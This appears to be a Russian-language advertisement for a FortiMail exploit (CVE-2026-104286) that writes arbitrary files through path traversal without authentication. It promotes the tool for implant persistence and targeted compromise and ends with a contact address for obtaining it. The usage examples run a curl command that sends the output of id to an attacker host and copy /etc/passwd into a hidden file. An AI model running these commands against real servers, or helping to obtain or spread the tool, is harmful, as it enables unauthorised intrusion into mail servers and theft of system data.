Неаутентифицированная эксплуатация обхода пути для CVE-2026-104286 в FortiMail, запись произвольных файлов через специально сформированные HTTP/HTTPS-запросы для оценки Red Team и закрепления.
Продвинутый эксплойт удалённой записи произвольных файлов без аутентификации для CVE-2026-104286 в FortiMail. Специально сформированные HTTP/HTTPS-запросы обходят санитизацию путей в веб-клиенте, что позволяет создавать произвольные файлы в базовой ОС. Используется для оценки в рамках red team, закрепления имплантов и целевой компрометации развёртываний FortiMail.
FortiMail 8.0.x (<8.0.2), 7.6.x (<7.6.6), 7.4.x (<7.4.8), 7.2.x (<7.2.9), 7.0.x (<7.0.10)
Ненадлежащее ограничение имени пути заданным каталогом (CWE-22). Отсутствие проверки последовательностей ../ в путях загрузки файлов в обработчиках HTTP/HTTPS API, что позволяет выходить за пределы предполагаемого каталога загрузки.
$ python3 cve-2026-104286.py -u http://target:443 -c "curl -s http://attacker:80/$(id)"
$ python3 cve-2026-104286.py -u http://target:443 -l /etc/passwd -o /var/tmp/.hacked
Контакт для получения эксплойта: [email protected]